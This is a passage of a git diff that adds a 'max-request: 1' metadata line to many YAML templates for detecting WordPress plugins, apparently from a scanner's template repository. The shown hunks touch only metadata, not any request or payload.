index 1d5224b457..ccd72e427a 100644
--- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/simple-custom-post-order/
   metadata:
+    max-request: 1
     plugin_namespace: simple-custom-post-order
     wpscan: https://wpscan.com/plugin/simple-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml
index aafd6c6a38..3622b2c6b3 100644
--- a/http/technologies/wordpress/plugins/siteguard.yaml
+++ b/http/technologies/wordpress/plugins/siteguard.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/siteguard/
   metadata:
+    max-request: 1
     plugin_namespace: siteguard
     wpscan: https://wpscan.com/plugin/siteguard
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
index e10ab985da..9eff765d61 100644
--- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml
+++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/siteorigin-panels/
   metadata:
+    max-request: 1
     plugin_namespace: siteorigin-panels
     wpscan: https://wpscan.com/plugin/siteorigin-panels
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml
index 9881b591ae..c856e1fa9e 100644
--- a/http/technologies/wordpress/plugins/smart-slider-3.yaml
+++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/smart-slider-3/
   metadata:
+    max-request: 1
     plugin_namespace: smart-slider-3
     wpscan: https://wpscan.com/plugin/smart-slider-3
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
index 0480b4b0e6..008440cc58 100644
--- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
+++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/so-widgets-bundle/
   metadata:
+    max-request: 1
     plugin_namespace: so-widgets-bundle
     wpscan: https://wpscan.com/plugin/so-widgets-bundle
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
index 26d525386b..410776862f 100644
--- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
+++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/
   metadata:
+    max-request: 1
     plugin_namespace: stops-core-theme-and-plugin-updates
     wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
index 3920c5cf56..f210a2a2f9 100644
--- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml
+++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/sucuri-scanner/
   metadata:
+    max-request: 1
     plugin_namespace: sucuri-scanner
     wpscan: https://wpscan.com/plugin/sucuri-scanner
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml
index f556786f5a..f1dd1bf150 100644
--- a/http/technologies/wordpress/plugins/svg-support.yaml
+++ b/http/technologies/wordpress/plugins/svg-support.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/svg-support/
   metadata:
+    max-request: 1
     plugin_namespace: svg-support
     wpscan: https://wpscan.com/plugin/svg-support
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
index 844e3d19a0..a9ec913599 100644
--- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
+++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/table-of-contents-plus/
   metadata:
+    max-request: 1
     plugin_namespace: table-of-contents-plus
     wpscan: https://wpscan.com/plugin/table-of-contents-plus
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml
index eb0f02f602..d38aeb0279 100644
--- a/http/technologies/wordpress/plugins/tablepress.yaml
+++ b/http/technologies/wordpress/plugins/tablepress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/tablepress/
   metadata:
+    max-request: 1
     plugin_namespace: tablepress
     wpscan: https://wpscan.com/plugin/tablepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
index 755efd53fa..07c43b9d80 100644
--- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
+++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/taxonomy-terms-order/
   metadata:
+    max-request: 1
     plugin_namespace: taxonomy-terms-order
     wpscan: https://wpscan.com/plugin/taxonomy-terms-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml
index 0403bb4e72..83a849e11e 100644
--- a/http/technologies/wordpress/plugins/the-events-calendar.yaml
+++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/the-events-calendar/
   metadata:
+    max-request: 1
     plugin_namespace: the-events-calendar
     wpscan: https://wpscan.com/plugin/the-events-calendar
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml
index cd2632ea05..c6100637d9 100644
--- a/http/technologies/wordpress/plugins/themeisle-companion.yaml
+++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/themeisle-companion/
   metadata:
+    max-request: 1
     plugin_namespace: themeisle-companion
     wpscan: https://wpscan.com/plugin/themeisle-companion
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
index b5f8b822c7..1f188b66c6 100644
--- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml
+++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/tinymce-advanced/
   metadata:
+    max-request: 1
     plugin_namespace: tinymce-advanced
     wpscan: https://wpscan.com/plugin/tinymce-advanced
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
index 85aaf7ff16..2c7b16cb44 100644
--- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
+++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/translatepress-multilingual/
   metadata:
+    max-request: 1
     plugin_namespace: translatepress-multilingual
     wpscan: https://wpscan.com/plugin/translatepress-multilingual
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
index 0af322b728..9d6afa8d3f 100644
--- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/
   metadata:
+    max-request: 1
     plugin_namespace: ultimate-addons-for-gutenberg
     wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml
index d4ac0d179e..87721a245a 100644
--- a/http/technologies/wordpress/plugins/under-construction-page.yaml
+++ b/http/technologies/wordpress/plugins/under-construction-page.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/under-construction-page/
   metadata:
+    max-request: 1
     plugin_namespace: under-construction-page
     wpscan: https://wpscan.com/plugin/under-construction-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml
index dbbadf3cfc..45e0dead0e 100644
--- a/http/technologies/wordpress/plugins/updraftplus.yaml
+++ b/http/technologies/wordpress/plugins/updraftplus.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/updraftplus/
   metadata:
+    max-request: 1
     plugin_namespace: updraftplus
     wpscan: https://wpscan.com/plugin/updraftplus
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml
index 401b0e479f..abec174ec3 100644
--- a/http/technologies/wordpress/plugins/use-any-font.yaml
+++ b/http/technologies/wordpress/plugins/use-any-font.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/use-any-font/
   metadata:
+    max-request: 1
     plugin_namespace: use-any-font
     wpscan: https://wpscan.com/plugin/use-any-font
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml
index 6f95506748..e088ac07a6 100644
--- a/http/technologies/wordpress/plugins/user-role-editor.yaml
+++ b/http/technologies/wordpress/plugins/user-role-editor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/user-role-editor/
   metadata:
+    max-request: 1
     plugin_namespace: user-role-editor
     wpscan: https://wpscan.com/plugin/user-role-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
index 4404f87aab..8b163200bf 100644
--- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
+++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/velvet-blues-update-urls/
   metadata:
+    max-request: 1
     plugin_namespace: velvet-blues-update-urls
     wpscan: https://wpscan.com/plugin/velvet-blues-update-urls
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml
index 8995434fce..2366a7dad7 100644
--- a/http/technologies/wordpress/plugins/w3-total-cache.yaml
+++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/w3-total-cache/
   metadata:
+    max-request: 1
     plugin_namespace: w3-total-cache
     wpscan: https://wpscan.com/plugin/w3-total-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
index 8175806cb8..71448e61e8 100644
--- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
+++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-converter-for-media/
   metadata:
+    max-request: 1
     plugin_namespace: webp-converter-for-media
     wpscan: https://wpscan.com/plugin/webp-converter-for-media
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml
index db82bc7f43..717554b89f 100644
--- a/http/technologies/wordpress/plugins/webp-express.yaml
+++ b/http/technologies/wordpress/plugins/webp-express.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-express/
   metadata:
+    max-request: 1
     plugin_namespace: webp-express
     wpscan: https://wpscan.com/plugin/webp-express
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
index 03ddae57bc..fba5c8b09c 100644
--- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
+++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/widget-importer-exporter/
   metadata:
+    max-request: 1
     plugin_namespace: widget-importer-exporter
     wpscan: https://wpscan.com/plugin/widget-importer-exporter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
index d6449bb5bf..631202198e 100644
--- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
+++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-cart-abandonment-recovery/
   metadata:
+    max-request: 1
     plugin_namespace: woo-cart-abandonment-recovery
     wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
index 2d5fdf1779..cc953078eb 100644
--- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
+++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-checkout-field-editor-pro/
   metadata:
+    max-request: 1
     plugin_namespace: woo-checkout-field-editor-pro
     wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
index 6b5705e20d..97ce674116 100644
--- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
+++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-variation-swatches/
   metadata:
+    max-request: 1
     plugin_namespace: woo-variation-swatches
     wpscan: https://wpscan.com/plugin/woo-variation-swatches
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
index dbcdb64bad..6d05a6f058 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-gateway-paypal-express-checkout
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
index fb9ea502ce..baf5af3bb5 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-stripe/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-gateway-stripe
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
index 48ffb25245..aa1898c4ba 100644
--- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-payments/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-payments
     wpscan: https://wpscan.com/plugin/woocommerce-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
index 4fa6fc3ffe..5fae796fdd 100644
--- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-paypal-payments/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-paypal-payments
     wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
index 1c1c690fcd..22f812e2b8 100644
--- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-pdf-invoices-packing-slips
     wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml
index 4d6702d81a..c637006d26 100644
--- a/http/technologies/wordpress/plugins/woocommerce-services.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-services/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-services
     wpscan: https://wpscan.com/plugin/woocommerce-services
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml
index 42cb8bc409..e020507ccb 100644
--- a/http/technologies/wordpress/plugins/woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce
     wpscan: https://wpscan.com/plugin/woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml
index 55d6effbf5..c92903fd79 100644
--- a/http/technologies/wordpress/plugins/wordfence.yaml
+++ b/http/technologies/wordpress/plugins/wordfence.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wordfence/
   metadata:
+    max-request: 1
     plugin_namespace: wordfence
     wpscan: https://wpscan.com/plugin/wordfence
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml
index 6786cab703..c25b2c1c48 100644
--- a/http/technologies/wordpress/plugins/wordpress-importer.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-importer/
   metadata:
+    max-request: 1
     plugin_namespace: wordpress-importer
     wpscan: https://wpscan.com/plugin/wordpress-importer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml
index 784ba22c8a..4d6dd14d25 100644
--- a/http/technologies/wordpress/plugins/wordpress-seo.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-seo/
   metadata:
+    max-request: 1
     plugin_namespace: wordpress-seo
     wpscan: https://wpscan.com/plugin/wordpress-seo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml
index 72ff55e58a..7ca0870ed6 100644
--- a/http/technologies/wordpress/plugins/worker.yaml
+++ b/http/technologies/wordpress/plugins/worker.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/worker/
   metadata:
+    max-request: 1
     plugin_namespace: worker
     wpscan: https://wpscan.com/plugin/worker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
index 8cfaa0f5a9..4f0d9be568 100644
--- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-fastest-cache/
   metadata:
+    max-request: 1
     plugin_namespace: wp-fastest-cache
     wpscan: https://wpscan.com/plugin/wp-fastest-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml
index 85900a01a7..f3c481b824 100644
--- a/http/technologies/wordpress/plugins/wp-file-manager.yaml
+++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-file-manager/
   metadata:
+    max-request: 1
     plugin_namespace: wp-file-manager
     wpscan: https://wpscan.com/plugin/wp-file-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml
index a7ccde0b49..ba214fd7ea 100644
--- a/http/technologies/wordpress/plugins/wp-google-maps.yaml
+++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-google-maps/
   metadata:
+    max-request: 1
     plugin_namespace: wp-google-maps
     wpscan: https://wpscan.com/plugin/wp-google-maps
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
index 422664a98c..8f5fe8d9a5 100644
--- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
+++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-mail-smtp/
   metadata:
+    max-request: 1
     plugin_namespace: wp-mail-smtp
     wpscan: https://wpscan.com/plugin/wp-mail-smtp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
index f0af3a748a..0458b13354 100644
--- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
+++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-maintenance-mode/
   metadata:
+    max-request: 1
     plugin_namespace: wp-maintenance-mode
     wpscan: https://wpscan.com/plugin/wp-maintenance-mode
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
index f89f1a20b3..d570be07bf 100644
--- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml
+++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-migrate-db/
   metadata:
+    max-request: 1
     plugin_namespace: wp-migrate-db
     wpscan: https://wpscan.com/plugin/wp-migrate-db
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
index 01fb12d0ad..ee05e3add8 100644
--- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
+++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-multibyte-patch/
   metadata:
+    max-request: 1
     plugin_namespace: wp-multibyte-patch
     wpscan: https://wpscan.com/plugin/wp-multibyte-patch
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml
index 1773857e15..df2487955f 100644
--- a/http/technologies/wordpress/plugins/wp-optimize.yaml
+++ b/http/technologies/wordpress/plugins/wp-optimize.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-optimize/
   metadata:
+    max-request: 1
     plugin_namespace: wp-optimize
     wpscan: https://wpscan.com/plugin/wp-optimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
index bcd1509c68..79ff01211c 100644
--- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml
+++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-pagenavi/
   metadata:
+    max-request: 1
     plugin_namespace: wp-pagenavi
     wpscan: https://wpscan.com/plugin/wp-pagenavi
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml
index c6aca20a60..23414b3d1d 100644
--- a/http/technologies/wordpress/plugins/wp-reset.yaml
+++ b/http/technologies/wordpress/plugins/wp-reset.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reset/
   metadata:
+    max-request: 1
     plugin_namespace: wp-reset
     wpscan: https://wpscan.com/plugin/wp-reset
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
index 56dfdf4a59..fba45020e4 100644
--- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
+++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reviews-plugin-for-google/
   metadata:
+    max-request: 1
     plugin_namespace: wp-reviews-plugin-for-google
     wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml
index 810fc82cde..0178c8e9fb 100644
--- a/http/technologies/wordpress/plugins/wp-rollback.yaml
+++ b/http/technologies/wordpress/plugins/wp-rollback.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-rollback/
   metadata:
+    max-request: 1
     plugin_namespace: wp-rollback
     wpscan: https://wpscan.com/plugin/wp-rollback
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml
index 2276545093..017cf76f11 100644
--- a/http/technologies/wordpress/plugins/wp-seopress.yaml
+++ b/http/technologies/wordpress/plugins/wp-seopress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-seopress/
   metadata:
+    max-request: 1
     plugin_namespace: wp-seopress
     wpscan: https://wpscan.com/plugin/wp-seopress
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
index 783d381ed8..a04ddc6003 100644
--- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
+++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
